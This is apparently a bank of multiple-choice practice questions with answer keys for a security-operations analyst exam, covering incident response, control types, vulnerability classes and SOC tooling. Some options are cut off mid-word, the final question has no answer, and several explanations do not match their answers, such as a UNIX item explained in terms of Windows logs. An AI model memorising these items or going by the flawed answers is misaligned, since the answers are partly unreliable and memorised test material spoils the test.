A company just experienced a data breach that resulted in losing sensitive customer information. The information disclosure is disastrous, and the company's stock has dropped precipitously. What functional type of controls should the company implement to mitigate the damages? A. Corrective B. Preventative C. Technical D. Managerial

A. Corrective Corrective controls act to eliminate or reduce the impact of an intrusion event. The company should use a corrective control after the data breach to help reduce the impact of the attack.

A cybersecurity analyst is investigating a security incident and must ensure that the collected data remains uncompromised and retains its integrity. Which of the following actions would be the most appropriate to achieve this goal while conducting the investigation? A. Create and store cryptographic hash values of the collected data B. Encrypt the collected data using a secure encryption algorithm C. Regularly back up the collected data to an external storage device D. Use a secure collaboration platform to share the data with team members

A. Create and store cryptographic hash values of the collected data The analyst can ensure data integrity and verify that no one has tampered with the data collected during the investigation by creating and storing cryptographic hash values. This supports evidence preservation and maintains the chain of custody.

A new cybersecurity team is in the process of enhancing raw data with additional information to make it more valuable for analysis and decision-making such as adding context, metadata, or other relevant data points. Which of the following best describes the actions they are undertaking? A. Data enrichment B. Threat feed combination C. Essential strategy D. Preemptive actions

A. Data enrichment Data enrichment is the process of enhancing raw data with additional information to make it more valuable for analysis and decision-making. This can involve adding context, metadata, or other relevant data points to provide a more complete and accurate understanding of the data.

A cybersecurity professional must analyze a security incident within an organization. Applying knowledge of attack methodology frameworks is essential to manage the situation effectively and prevent future attacks. Which action should the professional prioritize in this context? A. Determine the scope of the incident B. Preserve the integrity of digital evidence C. Deploy additional security monitoring tools D. Implement stricter access controls on sensitive data

A. Determine the scope of the incident Identifying the scope of the incident allows for a better understanding of the affected assets and the extent of the compromise. This is a crucial step in guiding the response strategy and mitigating the risk of future attacks.

The security analyst at a large organization is on the lookout for any active threats to the company's network. The organization requests that the analyst use the MITRE ATT&CK framework and the cyber kill chain model to monitor and analyze these threats. Upon receiving an alert about a potential spear-phishing attack, what should the analyst do first to evaluate the situation? A. Determine the stage of the attack in the cyber kill chain B. Examine post-exploitation actions taken by the attacker C. Implement security measures informed by the MITRE ATT&CK framework D. Evaluate the company's incident response protocol

A. Determine the stage of the attack in the cyber kill chain The primary focus of the analyst should be to identify the attack stage in the Cyber Kill Chain model. Understanding the stage of the attack helps the analyst determine the scope and potential impact of the threat and guides the response actions accordingly.

The cybersecurity leadership team of a company is reviewing its incident response plan (IRP) and must consider the role of business continuity (BC) and disaster recovery (DR) in the IRP. How should the company account for BC/DR in its incident response plan? A. Develop and test BC/DR plans for operational resilience B. Conduct regular tabletop exercises C. Train employees on phishing awareness D. Establish an incident response team

A. Develop and test BC/DR plans for operational resilience Integrating BC/DR plans into the IRP can help ensure operational resilience and help the company recover from potential disruptions to its business operations. Developing and testing BC/DR plans can help improve the effectiveness of its IRP.

Nation-state actors successfully breached another country's government agency and stole some hard drives. The stolen hard drives hosted only a single virtual appliance replicating to another remote location. A scan of the remaining systems showed that data was easily accessible through physical means. How can the system administrators improve their security for data at rest? A. Encrypt the virtual server B. Setup backup targets C. Configure high availability D. Setup for disaster recovery

A. Encrypt the virtual server Encryption provides data-at-rest security for virtual and physical servers at the drive level. For example, if a hard drive gets stolen, the data is not recoverable without the decryption keys.

An organization regularly generates vulnerability reports using automated tools. One of the reports has identified a vulnerability with a high-risk score previously addressed in an old report. After an investigation, the organization found that the newly added assets reintroduced old problems. What should the organization do to prevent such recurrence in the future? A. Ensure that the asset inventory is accurate B. Develop policies and procedures for generating vulnerability reports on a regular schedule C. Follow best practices and improve the effectiveness of reports by using consistent formats D. Conduct scans manually

A. Ensure that the asset inventory is accurate One of the causes of reoccurring vulnerabilities was an inaccurate asset inventory. In this case, the organization needs to ensure that the asset inventory is accurate to prevent previously addressed vulnerabilities from showing in the report.

The Department of Homeland Security announces a binding operational directive for federal agencies. This is an example of what? A. Government bulletins B. CERT C. MITRE ATT&CK D. Metadata

A. Government bulletins Government bulletins contain information and advice related to defending against cyber threats. A binding operation directive is a government bulletin that contains guidance federal agencies must implement.

A web application that allows users to upload images to their profile has a security vulnerability. An attacker can upload a specially crafted image, causing the web application to try to write data beyond the end of a dynamically allocated portion of memory allocated during run-time. The application does not properly handle the overflow, allowing the attacker to execute arbitrary code on the server. What type of vulnerability does this situation describe? (Select the two best options.) A. Heap overflow B. Buffer overflow C. Stack overflow D. Integer overflow

A. Heap overflow B. Buffer overflow Heap overflow is a software vulnerability where the system allows input to overwrite memory locations within the area of a process's memory allocation. The memory allocation stores dynamically sized variables. Buffer overflow is an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. Buffer overflow is a general term referring to both heap and stack overflows.

The power plant's operational technology specialist routinely inspects all operational controls. Which of the following are examples of operational technologies (OTs)? (Select the three best options.) A. ICSs B. PLCs C. SCADA systems D. SaaS

A. ICSs B. PLCs C. SCADA systems An industrial control system (ICS) is a network that manages embedded devices, such as computer systems, designed to perform a specific, dedicated function. Programmable logic controllers (PLCs) are industrial settings and a form of digital computing designed to enable automation in assembly lines, autonomous field operations, robotics, and many other applications. Supervisory Control and Data Acquisition (SCADA) is an industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer.

A company has been the victim of an information breach. The breach has exposed the personal information of millions of customers. The company is facing a number of lawsuits and fines. What is the best way to mitigate the damage from the breach? A. Identify and communicate with all stakeholders B. Identify and report an incident C. Establish who, what, when, where, and why the incident occurred D. Create recommendations on reducing vulnerability

A. Identify and communicate with all stakeholders Stakeholder identification and communication are important parts of crisis management. In a data breach, it is important to identify and communicate with all stakeholders affected, such as customers, employees, investors, and regulators.

A security analyst at a financial institution is responsible for identifying active threats to the organization's network. The analyst uses the Open Source Security Testing Methodology Manual (OSSTMM) and the Open Web Application Security Project (OWASP) Testing Guide to monitor and analyze these threats effectively. The analyst receives an alert about a potential spear-phishing attack targeting employees. When using these methodologies to assess the situation, what should be the analyst's primary focus? A. Identifying threat indicators and potential vulnerabilities B. Implementing security controls based on OSSTMM recommendations C. Conducting penetration testing on the organization's web applications D. Reviewing the company's security policies and procedures

A. Identifying threat indicators and potential vulnerabilities By using the OSSTMM and OWASP Testing Guide to assess an active threat like a spear-phishing attack, the analyst can determine the scope and potential impact of the threat to help guide response actions effectively.

A company is implementing a new authentication system that uses passwordless and SSO capabilities. During the rollout, the IT team notices some employees are having trouble accessing certain applications and resources, while others are experiencing no issues. Upon investigation, the team discovers that some applications and resources are not compatible with the new system. What is the best course of action for the IT team to take in response to this issue? A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system B. Contact the vendors of the incompatible applications and resources to see if they have updates that will make them compatible with the new system C. Notify all employees to use their previous login credentials until the incompatible applications and resources are updated D. Ignore the issue and allow some employees to be unable to access certain applica

A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system Immediately rolling back the passwordless and SSO authentication system and reverting to the previous system is the best option because it will restore the system to the previous state in which all employees could access all applications and resources.

A cybersecurity analyst has to identify active threats within their organization. To preserve relevant data and logs for potential legal proceedings, what action should the analyst take while conducting the investigation? A. Implement a legal hold B. Backup all relevant data C. Store relevant data on encrypted external storage D. Provide the legal department with relevant data

A. Implement a legal hold Placing a legal hold on the relevant data and logs ensures their preservation for potential legal proceedings while allowing the continuation of the investigation. It prevents the alteration or deletion of the data and logs in question.

An HVAC company's cybersecurity department has discovered a critical security vulnerability in their host devices and has received a patch from the vendor. What is the best way to ensure the cybersecurity department addresses and fixes the vulnerability? A. Implementation B. Rollback C. Validation D. Software development life cycle

A. Implementation Patch implementation deploys patches or configuration changes to software or systems to correct security vulnerabilities, bugs, or other issues.

An organization recently experienced a cyber incident that temporarily halted its operations. The cybersecurity team wants to strengthen its resilience strategies and address potential threats before they cause significant harm. As part of this process, the team must look into the primary factor behind the recent incident. Which of the following techniques would most effectively pinpoint the cause and enhance operational preparedness? A. Implementing a hypothesis-driven investigation B. Analyzing historical logs C. Focusing on real-time network monitoring D. Conducting penetration tests on critical systems

A. Implementing a hypothesis-driven investigation A hypothesis-driven investigation involves proactively searching for potential threats based on specific assumptions. This allows the team to focus on possible causes and identify previously unknown issues, improving the organization's operational preparedness.

A healthcare provider has recently experienced a data breach resulting from sniffing attacks against its employee web portal for authentication. The incident response team needs to provide recommendations for improving the organization's response plan. Which of the following recommendations would be the most effective? A. Implementing multi-factor authentication B. Upgrading the firewall software C. Running regular vulnerability scans D. Conducting security awareness training for employees

A. Implementing multi-factor authentication Multi-factor authentication is a critical security measure that can prevent unauthorized access to systems and data. This recommendation can help the organization strengthen its security posture and prevent future attacks.

What are the advantages of implementing single sign-on (SSO) technology for an organization's authentication process? (Select the two best options.) A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices C. Eliminating the need for multi-factor authentication (MFA) D. Providing an additional layer of security through the use of biometric authentication

A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices Single sign-on (SSO) technology enhances security and simplifies access management by allowing users to authenticate to multiple applications or systems with a single set of credentials, thereby reducing the need for multiple logins and passwords. Passwordless authentication via SSO further improves security by using more secure methods like smart cards or mobile devices.

The IT department at a healthcare organization is developing a training program to improve overall security awareness among employees. Which of the following elements should they include in the training program to effectively communicate the real-world consequences of inadequate security practices and emphasize the importance of proper security measures and protocols? A. Incorporate lessons learned from past security incidents B. Provide open discussions and feedback C. Develop targeted communication strategies for different departments D. Ensure consistent messaging across all training materials

A. Incorporate lessons learned from past security incidents Including lessons learned from past incidents in the training program effectively communicates the real-world consequences of inadequate security practices and emphasizes the importance of adhering to proper security measures and protocols.

A database engineer notices altered database records. The engineer first notifies the correct parties and reports the compromise immediately. Which of these would best identify the type of impact metric the engineer encountered? A. Integrity B. Availability C. Confidentiality D. Privacy

A. Integrity The impact of vulnerability considers the potential damage caused by successful exploitation and the effort required to mitigate it. Integrity issues extended to when the system's functionality changed or got impaired (i.e., modification of database records).

A security analyst encounters multiple vulnerabilities relating to a file server on the 192.168.52.0/26 network. However, due to firewall rules, the file server is only exploitable on port 445 by specially crafted packets coming from the 192.168.52.5 host. What type of network vulnerability has the security analyst discovered? A. Internal B. External C. Isolated D. SCADA

A. Internal The address 192.168.52.0/26 is a private IP space which indicates an internal network vulnerability. Unfortunately, private network IP ranges are not routable on the public internet.

A security analyst at a large financial institution monitors network traffic for any unusual activity. The analyst notices an unusual spike in network traffic occurring on an unexpected port, indicating possible malicious activity. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly

A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.

While monitoring the network traffic of a large financial institution, a security analyst notices an unusual pattern of outgoing traffic occurring on an unexpected port. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly

A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.

During a digital forensic analysis, an analyst may generate what kinds of useful information? (Select the three best options.) A. IoCs B. Vulnerabilities C. Misconfigurations D. OSINT

A. IoCs B. Vulnerabilities C. Misconfigurations Indicators of Compromise (IoCs) are items that suggest a compromise may have occurred. These can include communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Vulnerabilities are flaws in a system, software, or device that weaken security and present an opportunity for exploitation. Misconfigurations are deviations from required configuration standards. Misconfigurations create an opportunity for exploitation.

A cybersecurity professional is helping with their organization's incident response planning. When dealing with a security incident, the professional must prioritize preserving critical data and the remediation of affected systems. Which of the following actions should the professional take to address these priorities effectively? A. Isolate the affected systems and create secure backups of critical data B. Encrypt all sensitive data and share it with the incident response team C. Immediately notify all employees about the security incident D. Perform a complete system restore without creating backups

A. Isolate the affected systems and create secure backups of critical data Isolating the affected systems helps to prevent the spread of the security threat, allowing for effective remediation. Creating secure backups of critical data ensures its preservation and availability during the incident response process.

A web application allows users to download files by specifying a file name in the URL. An attacker manipulates the URL to include a file path located on the server, and the application does not properly validate the input. As a result, the attacker can download sensitive files that should not be accessible to them. What type of vulnerability does this situation describe? A. Local file inclusion B. Remote file inclusion C. RCE D. XSS

A. Local file inclusion Local file inclusion (LFI) allows attackers to access local files on the server hosting a web application. LFI can occur from bad input validation or insecure coding practices. This file inclusion is local since the file resides on the target server.

An information security project manager has an important stakeholder meeting for the security operations center's (SOC's) future projections. Most executives will require visualizers of critical systems across the network and how they correlate to simulated attacks, which the SOC has built controls around. Which tool can help stakeholders understand how the mapped network prevents mock attacks? A. Maltego B. Prowler C. ScoutSuite D. Nmap

A. Maltego Maltego is a very sophisticated visualization tool that helps investigators quickly identify relationships among entities of many types. As a result, Maltego can help in many investigations, from people and social engineering to malware analysis.

A cloud security analyst is reviewing the output of a cloud vulnerability assessment. The analyst's primary objective is to determine which vulnerabilities pose the greatest risk to the organization. Which approach should the analyst prioritize to achieve this goal? A. Map vulnerabilities to the Diamond Model's elements to prioritize remediation B. Implement encryption for all data at rest and in transit C. Enforce strict Identity and Access Management (IAM) policies D. Regularly review cloud provider security documentation

A. Map vulnerabilities to the Diamond Model's elements to prioritize remediation By mapping the identified vulnerabilities to the Diamond Model's elements, the analyst can prioritize the remediation of vulnerabilities with the greatest potential impact on the organization. This approach aligns with the Open Web Application Security Project (OWASP) Testing Guide's methodology, which focuses on identifying and mitigating the most severe risks.

A pipe fitting company has experienced a data breach, and the security team has initiated a movement to contain the source of the breach 428 minutes after the breach began. It is roughly in line with the team's normal performance for this task. What metric does this refer to? A. Mean time to respond B. Mean time to remediate C. Alert volume D. Mean time to detect

A. Mean time to respond The mean time to respond is the average time it takes to react to a security incident or event after it detects the event. The team took 428 minutes to respond to the breach initially.

After discovering malicious activity on a network, what artifacts might a threat hunter analyze to identify additional indicators of compromise (IoCs)? (Select the three best options.) A. Memory dumps B. Network traffic C. Paid feeds D. Log files

A. Memory dumps B. Network traffic D. Log files Log files are records of events on a given system. Threat hunters develop indicators of compromise (IoCs) based on specific events found in the logs. Memory dumps are records of the information contained in RAM. They can provide valuable information about running processes that may not be available anywhere else. Network traffic is the information transiting a network. Monitoring it for specifically formatted information can help identify malicious activity.

Which of the following tools will allow a security analyst to run the module auxiliary/admin/networking/cisco_secure_acs_bypass to scan for vulnerabilities on a Cisco device? A. Metasploit Framework B. Nmap C. Recong-ng D. Pacu

A. Metasploit Framework The Metasploit Framework has a module library with the auxiliary/admin/networking/cisco_secure_acs_bypass module available for use. Administrators specify the module using these paths in the library.

A hair salon's web application allows customers to schedule appointments with their stylists. The application runs on outdated software and represents a security risk, but the software is also critical for business operations. Therefore, the hair salon requests that the software vendor address the security risks while limiting the software's access to the hair salon's internal network. What kind of risk response does this represent? A. Mitigation B. Acceptance C. Transference D. Avoidance

A. Mitigation Risk mitigation describes reducing exposure to risk items by implementing mitigating controls to ensure that technical business operations remain safe.

A security analyst at a large financial institution has recently noticed an increase in unexpected outbound communication and is concerned about potential data exfiltration. Which of the following actions should the analyst take to address this? (Select the three best options.) A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems D. Block all outbound traffic from the organization's network to mitigate data loss during the investigation

A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems Monitoring network traffic is essential in detecting suspicious outbound connections because the analyst can identify any unusual outbound traffic patterns and investigate further. Implementing network segmentation can prevent lateral movement by attackers and limit their ability to access sensitive data. Checking for malware or malicious software on the organization's systems is also crucial in identifying any malicious activity causing unexpected outbound communication.

A network engineer is gathering requirements from a security operations center (SOC) analyst. Which of the following requirements might lead the engineer to suggest deploying a honeypot? (Select the two best options.) A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. C. The organization needs to minimize human interaction through orchestration. D. Analysts need the ability to code in XML.

A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources. Indicators of compromise (IoCs) are items that suggest a compromise may have occurred. Indicators of attack (IoAs) are items that can identify an ongoing attack.

A network administrator is deploying a new layer 3 switch for the company. The manager mentioned that the traffic flow needed to be more predictable, easier to monitor, and simpler to filter. What should the administrator implement during the setup to include the security and performance benefits the manager requested? A. Network segmentation B. Supervisory control and data acquisition system C. Industrial control system D. Network sensor

A. Network segmentation The network administrator should implement segmentation using virtual private networks (VPNs) or virtual local area networks (VLANs) due to the layer 3 switch referred to in the open-source interconnection (OSI) model. This enforces a security zone by separating a network segment from access from the rest of the network.

Which of the following are reasons a security operations center (SOC) manager might consider implementing a security orchestration, automation, and response (SOAR)? (Select the two best options.) A. Notices analysts performing a high volume of mundane tasks to clear SIEM alerts B. Identifies a high volume of false positives in the SIEM C. Identifies a honeypot D. Identifies analysts threat hunting

A. Notices analysts performing a high volume of mundane tasks to clear SIEM alerts B. Identifies a high volume of false positives in the SIEM Security orchestration, automation, and response (SOAR) automates well-documented, highly procedural actions taken in response to alerts generated by specific security information and event management (SIEM.) When something triggers an alert, the system can analyze it by following a defined set of instructions. A SOAR is an effective way to resolve false positive alerts in a SIEM using automated analysis.

A security researcher identifies a financial fraud scheme targeting multiple pharmaceutical companies. What type of actor is most likely responsible for this activity? A. Organized crime B. Nation state C. Hacktivists D. Script kiddie

A. Organized crime Organized crime refers to malicious activity characterized by the generation of illicit profit. Frequently, this activity involves financial fraud and blackmail.

A large financial institution is considering passwordless authentication and SSO as part of a new incident response and management plan to improve security and streamline operations. Which of the following is true about passwordless authentication and SSO in incident response and management? A. Passwordless authentication and SSO can help reduce incident response and management time. B. Passwordless authentication and SSO are not suitable for incident response and management as they create additional security risks and complexities. C. Passwordless authentication and SSO are only useful for small organizations with limited security needs. D. Passwordless authentication and SSO can only be used for incident response and management in large organizations.

A. Passwordless authentication and SSO can help reduce incident response and management time. Passwordless and single sign-on (SSO) are two authentication technologies frequently used in incident response and management. These technologies involve the handling of cybersecurity incidents in a systematic manner and include detection, analysis, containment, eradication, and recovery.

A cybersecurity analyst is investigating a potential security incident within an organization. The analyst needs to apply knowledge of host indicators to ensure an accurate and thorough analysis. What action should the analyst prioritize? A. Perform data and log analysis B. Validate the integrity of data C. Update antivirus signatures D. Implement data loss prevention solutions

A. Perform data and log analysis Analyzing data and logs enables the cybersecurity analyst to identify suspicious activities and potential host indicators of compromise. This process is essential for an accurate and thorough security incident analysis.

A security analyst is scheduling a vulnerability scan on several company critical systems. What process should the analyst consider for false positives, scan speeds, and system identification? A. Performance B. Operations C. Fuzzing D. Device fingerprinting

A. Performance When performing vulnerability scans, it is important to consider identifying the operating system of the targets. Additionally, scan speed is important as it can affect the accuracy of the scan results. Identifying and managing false positives reduce the time spent researching and validating them and for increasing the accuracy of the scan results.

The security team at an organization has noticed an increase in suspicious activity on their network. They must determine the underlying causes behind these activities to prevent future occurrences. Which technique would best help the team identify the reasons for the suspicious activity on their network? (Select the two best options.) A. Performing root cause analysis B. Performing forensic analysis C. Attending security awareness training sessions D. Performing regular vulnerability assessments

A. Performing root cause analysis B. Performing forensic analysis Conducting root cause analysis allows the team to investigate the factors contributing to the issue. It helps identify the reasons for the suspicious activity on their network, enabling them to address the problem at its source.

When gathering requirements for a new firewall, a security engineer realizes an out-of-the-box device will not meet all of the organization's needs. However, it is possible to cover all the requirements by purchasing additional features. What is this extended functionality called? (Select the two best options.) A. Plugins B. Apps C. APIs D. Data enrichment

A. Plugins B. Apps Plugins, also called extensions, are tools that add functionality to existing hardware or software without altering the original program. They increase the functionality of security tools. Apps, or applications, are additional programs designed to run on another hardware or software platform. Engineers frequently use them to increase the functionality of security tools, often for an additional fee.

A facility security officer oversees the installation of a multi-layered, hardened steel door for the corporation's most sensitive server room. What security control functional type does this represent? A. Preventative B. Managerial C. Operational D. Technical

A. Preventative Preventative controls are a functional control type that eliminates or reduces the likelihood that an attack can succeed. For example, installing a multi-layered steel door to protect the server is a preventative control measure.

A penetration tester has gained user-level access through a credential-stuffing attack against a Windows host in the target network. The Windows host's security logging policy will show multiple failed login attempts. To avoid detection, the penetration tester needs to modify the security logs to conceal their presence. What is the biggest obstacle the penetration tester will face in attempting this? A. Privileges required B. User interaction C. Attack complexity D. Windows Defender

A. Privileges required User-level privileges are insufficient to modify Windows Security Logs, which makes privilege escalation a top priority for the penetration tester.

A penetration tester has gained user-level access through a remote code execution vulnerability UNIX server in the target network. The UNIX server's syslog daemon will record multiple failed login attempts. Also, the syslog files need modifying to avoid detection and conceal the penetration tester's presence. What first step must the penetration tester take to achieve this? A. Privileges required B. User interaction C. Attack complexity D. Establish persistence

A. Privileges required User-level privileges are insufficient to modify Windows Security Logs. Therefore, the penetration tester must escalate privileges to clear the syslog files successfully.

One of the debugging application's windows shows a light blue name, LoadLibraryA, in a single column. What is the purpose of these callouts, as displayed in the disassembly window of the application? A. Program functions B. CPU registers C. Hex view of program D. First breakpoint in command-line interface

A. Program functions Program functions, like LoadLibraryA or SendMessageW, display in blue in the last column of the disassembly window.

Which of the following concepts related to security operations involves the use of digital certificates to establish trust between entities and secure communication channels? A. Public key infrastructure (PKI) B. Single sign-on (SSO) C. Intrusion detection system (IDS) D. Firewall

A. Public key infrastructure (PKI) PKI is a framework that enables secure communication by using digital certificates to authenticate and establish trust between entities. Secure Sockets Layer (SSL) is a protocol that uses PKI to secure communication channels such as web traffic.

A malicious actor is combing through LinkedIn to find email addresses to target in an upcoming campaign. Which of the following terms describe this activity? (Select the three best options.) A. Reconnaissance B. OSINT collection C. Social media exploitation D. Threat hunting

A. Reconnaissance B. OSINT collection C. Social media exploitation Reconnaissance is an initial step in network exploitation. It involves gathering information that will be useful for conducting malicious activity. Open-source intelligence (OSINT) refers to any information that is readily available on the public internet. Social media exploitation refers to gathering data from communities like LinkedIn, Facebook, and Glassdoor where varying degrees of information are available about a targeted organization.

Which of the following is a benefit of vulnerability management reporting? A. Reduced response time to cyber threats B. Higher risk of cyberattacks C. Decreased awareness of potential weaknesses in systems D. Increased complexity of IT infrastructure

A. Reduced response time to cyber threats Vulnerability management reporting aims to improve an organization's response to cyber threats. By incorporating vulnerability management into the incident response plan, organizations can efficiently identify and respond to security incidents, minimizing damage and downtime.

What are the benefits of network segmentation in security operations, specifically in relation to system and network architecture concepts and operating system (OS) concepts? (Select the two best options.) A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity C. Increasing network performance by reducing network congestion D. Enabling easier access to resources across different network segments

A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity Network segmentation is a security practice that divides a network into smaller, isolated segments, reducing the attack surface by limiting access to sensitive resources. Network segmentation enables more effective monitoring of network traffic and detection of anomalous activity, making it easier for security teams to identify and respond to potential threats.

A security analyst discovers that unauthorized privileges have been granted to a new account that was created with high-level access, which was not authorized by the security team. Which of the following is the most effective way to prevent the introduction of new accounts with unauthorized privileges in an organization's environment? A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts B. Use strong passwords and enforce password policies to prevent unauthorized access to user accounts C. Block access to the organization's network from external sources to prevent attacks and data breaches D. Implement a firewall to monitor all incoming and outgoing network traffic to identify suspicious activity

A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts Regularly reviewing and auditing user accounts identifies accounts that should be disabled, have been compromised, and have been granted unauthorized access privileges to the organization's systems.

An emergency management director for a large bank has extensive plans for use in the event of a natural disaster. These plans include details on the continuity of operations and restoring services to the public after a catastrophic event. Which security control functional type best describes this situation? A. Responsive B. Managerial C. Operational D. Corrective

A. Responsive Responsive controls serve to direct corrective actions enacted after an incident occurs. For example, in a Security Operations Center (SOC), responsive controls might include several well-defined actions by an analyst after identifying a specific issue. The analyst documents these actions in a playbook. Detailed plans on how to continue operations and restore services are responsive controls.

The network team is assessing the cloud infrastructure of an Amazon Web Services (AWS) account and needs to determine which groups have access to the cloud storage. Where should the network team search for the information in the HTML report? A. S3 buckets config B. Network VPCs C. Config dashboard D. iam__enum_permissions module

A. S3 buckets config The S3 buckets are the storage assets on AWS, and the S3 buckets config section will show a list of groups with access to the buckets via the Identity and Access Management (IAM) policies.

What system manages large-scale, multiple-site devices and equipment spread over geographically large areas from a housed server to field devices? A. SCADA B. ICS C. PLC D. HMI

A. SCADA Supervisory control and data acquisition (SCADA) is an industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer.

A cybersecurity analyst has noticed an increase in suspicious activity on the network. They consider implementing a security information and event management (SIEM) solution and endpoint detection and response (EDR) solution to help identify and respond to potential threats. What is a potential benefit of implementing both a SIEM and EDR solution in a security operations environment? A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. B. SIEM can provide in-depth analysis of endpoint activity, while EDR can identify and prevent malicious network traffic from entering the network. C. SIEM can identify and prevent malware from infecting endpoints, while EDR can monitor and report on network activity to identify potential threats. D. SIEM can prevent unauthori

A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats.

A new cybersecurity team is seeking a solution that can automate the company's security operations, incident response, threat intelligence, and vulnerability management systems. Which of the following terms best describes this solution? A. SOAR B. SIEM C. EDR D. NAC

A. SOAR Security orchestration, automation, and response (SOAR) is a solution that automates security operations and integrates security tools, allowing organizations to improve their ability to detect and respond to threats quickly and efficiently.

A social media application has a feature that allows users to enter the URL of a video for users to show their favorite video. An attacker submits a specially crafted URL that includes a call for the social media company's internal network resource, and the web application processes the request without proper validation. The internal network, trusting the web application, complies with the malicious call, permitting the attacker to steal sensitive information from the internal network. What type of vulnerability does this situation describe? A. SSRF B. XSS C. Cryptographic failures D. Broken access control

A. SSRF Server-side request forgery (SSRF) is a security vulnerability where an attacker tricks a web application into sending malicious HTTP requests to an internal or external network resource that trusts the web application. It potentially leads to data theft or system compromise.

The management information director is responsible for identifying and addressing any newly discovered vulnerabilities before attackers can exploit them. With implementing new software onto the network and constantly rolling out vendor updates, what should the director pay close attention to when running vulnerability scans in a timely manner? A. Scheduling B. Operations C. Performance D. Compliance

A. Scheduling Regular vulnerability scans help ensure that installed patches are effective and do not introduce new vulnerabilities. Scheduling vulnerability scans is essential to ensure that an organization's systems and networks remain secure before malicious actors may exploit weaknesses.

An information architect is currently in the process of labeling data assets for inventory use. The data inventory contains intellectual property, customer data, and confidential corporate data. How does the architect catalog these data types into the inventory? A. Sensitivity levels B. Performance use C. Segmented zone D. Technical controls

A. Sensitivity levels The architect uses sensitivity levels which involve categorizing data assets created, controlled, or maintained by an organization.

A cybersecurity organization faces challenges with key performance indicators (KPIs). Which of the following is a potential challenge that the organization may face while setting service-level objectives (SLOs)? A. Service-level objectives (SLOs) must be measurable to be effective. B. Key performance indicators (KPIs) must be absent for service-level objectives (SLOs) to be measurable. C. Service-level objectives (SLOs) are not comprehensive enough. D. Key performance indicators (KPIs) are not measurable.

A. Service-level objectives (SLOs) must be measurable to be effective. Service-level objectives (SLOs) can be challenging for cybersecurity organizations due to the changing cybersecurity landscape and capabilities of the organization. Therefore, SLOs should be flexible and adaptable to ensure they remain relevant and useful. This means that cybersecurity organizations may need to change their SLOs over time to reflect changes in the cybersecurity landscape and their organization's capabilities.

A cybersecurity specialist is checking a link to a news article within a colleague's email. The email appears to be genuine, but the link is deliberately obscured. The specialist suspects that the link may be part of a social engineering attack that aims to exploit the organization's security vulnerabilities. What is the role of obfuscated links in social engineering attacks and their impact on IT security operations? (Select the three best options.) A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. D. Obfuscated links a

A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering attacks rely on the exploitation of human vulnerabilities, such as trust and curiosity, to gain unauthorized access to sensitive information or networks. Attackers often use obfuscated links in phishing attacks using social engineering to trick users into clicking on a link that leads to a fake website designed to steal personal information. Attackers often use obfuscated links in social engineering attacks to redirect users to malicious websites that can infect their devices with malware or steal login credentials.

What is a true statement about the factors concerning the use of top 10 style lists? A. They allow for a quick and easy overview of important activities and trends. B. They provide an exhaustive list of all potential problems. C. They are useful for developing policies and procedures but not effort prioritization. D. They are ineffective when used in a detailed report.

A. They allow for a quick and easy overview of important activities and trends. Top 10 lists effectively highlight potential problems or focus on important activities, trends, or environmental changes. They are a quick and easy way to gain an overview of what is happening within a system, and they can identify potential problems that may need further investigation.

What are compensating controls used for? A. To add additional layers of security when traditional measures are not viable B. To replace primary security measures C. To track and control changes in system configuration D. To ensure that security approaches and capabilities are aligned with changing business requirements

